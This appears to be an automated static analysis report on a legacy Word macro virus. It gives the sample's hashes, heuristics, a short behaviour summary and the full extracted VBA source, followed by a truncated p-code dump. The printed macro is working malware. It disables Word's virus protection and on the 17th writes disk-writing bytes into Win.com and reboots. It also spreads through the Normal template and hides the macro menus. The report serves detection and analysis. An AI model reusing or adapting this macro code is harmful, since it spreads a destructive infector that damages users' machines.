Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 73c7d94c99851ae7…

MALICIOUS

Office (OLE)

30.5 KB Created: 1997-01-29 21:37:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 2126373a2e90c4391f6097c37be774cb SHA-1: 77b6086bc1f6430467eb4d071129965f6043c7ed SHA-256: 73c7d94c99851ae7eb80e0f3a5203a33271f150e15b1527bf6f2865a2c7f1a5c
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample contains a legacy WordBasic AutoOpen macro, identified by the OLE_LEGACY_WORDBASIC_AUTOEXEC heuristic. This macro attempts to write a file named 'Win.com' to the Windows directory using hardcoded hexadecimal byte sequences. It then attempts to reboot the system using ExitWindowsEx. The macro also attempts to remove itself from the Normal template, indicating an effort to evade detection and maintain persistence.

Heuristics 3

  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9765 bytes
SHA-256: 16780812123d4b0e81f39aa0d83d7eea11fcb10e568d1e435d4cdddd5b9af9d9
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ET_No1"
Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Attribute GetWindowsDirectory.VB_ProcData.VB_Invoke_Func = "ProVirus.Virus.AutoOpen"
Private Declare Function ExitWindowsEx Lib "User32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Sub AutoOpen()
'
Dim DD As Byte

    On Error Resume Next
    
    Options.VirusProtection = False
    
    If Day(Date) = 17 Then
        Txt1 = "E9FD09"
        Txt2 = "B80103BB0080B90100BA8000CD13E9FC04"
        windir$ = String(144, " ")
        l = GetWindowsDirectory(windir$, 144)
        windir = Left(windir$, l)
        Open windir + "\Win.com" For Binary Access Write Lock Read As #1
            For i = 1 To 3
                DD = "&H" + Mid(Txt1, 2 * i - 1, 2)
                Put #1, , DD
            Next i
            For i = 1 To 17
                DD = "&H" + Mid(Txt2, 2 * i - 1, 2)
                Put #1, 2560 + i, DD
            Next i
        Close #1
        Call ExitWindowsEx(6, 0)
    End If
       
       DocName = ActiveDocument.Path + "\" + ActiveDocument.Name
       DotName = NormalTemplate.Path + "\" + NormalTemplate.Name
    If CommandBars("Visual Basic").Controls(1).Caption <> "ETKill" Then
       Application.OrganizerDelete Source:=DotName, Name:="ET_No1", Object:=wdOrganizerObjectProjectItems
       Application.OrganizerCopy Source:=DocName, Destination:=DotName, Name:="ET_No1", Object:=wdOrganizerObjectProjectItems
       DelTools
       CustomizationContext = NormalTemplate
       FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
       CustomizationContext = NormalTemplate
       FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable
       For k = 1 To CommandBars("Visual Basic").Controls.Count
            CommandBars("Visual Basic").Controls(1).Delete
       Next k
       Set MyFlag = CommandBars("Visual Basic").Controls.Add(Type:=msoControlButton, ID:=752)
       MyFlag.FaceId = 30
       CommandBars("Visual Basic").Controls(1).Caption = "ETKill"
       NormalTemplate.Save
    Else
       Application.OrganizerCopy Source:=DotName, Destination:=DocName, Name:="ET_No1", Object:=wdOrganizerObjectProjectItems
       ActiveDocument.Save
    End If
End Sub

Sub DelTools()
    For i = 1 To CommandBars("Tools").Controls.Count
       If CommandBars("Tools").Controls(i).Caption = "ºê(&M)" Then
            CommandBars("Tools").Controls(i).Delete
            Exit For
       End If
    Next i
    For i = 1 To CommandBars("Tools").Controls.Count
       If CommandBars("Tools").Controls(i).Caption = "×Ô¶¨Òå(&C)..." Then
            CommandBars("Tools").Controls(i).Delete
            Exit For
       End If
    Next i
    Application.OnTime When:=Now + TimeValue("00:0:01"), Name:="DelTools"
End Sub

' Processing file: /opt/analyzer/scan_staging/4fce7231d25c498ea3ffccacda3e2214.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/ET_No1 - 4814 bytes
' Line #0:
' 	FuncDefn (Private Declare Function GetWindowsDirectory Lib "kernel32" (ByVal lpBuffer As String, ByVal nSize As Long) As Long)
' Line #1:
' 	FuncDefn (Private Declare Function ExitWindowsEx Lib "User32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long)
' Line #2:
' 	FuncDefn (Sub AutoOpen())
' Line #3:
' 	QuoteRem 0x0000 0x0000 ""
' Line #4:
' 	Dim 
' 	VarDefn DD (As Byte)
' Line #5:
' Line #6:
' 	OnError (Resume Next) 
' Line #7:
' Line #8:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #9:
' Line #10:
' 	Ld Date 
' 	ArgsLd Day 0x0001 
' 	LitDI2 0x0011 
' 	Eq 
' 	IfBlock 
' Line #11:
' 	LitStr 0x0006 "E9FD09"
' 	St Txt1 
' Line #12:
' 	LitStr 0x002
... (truncated)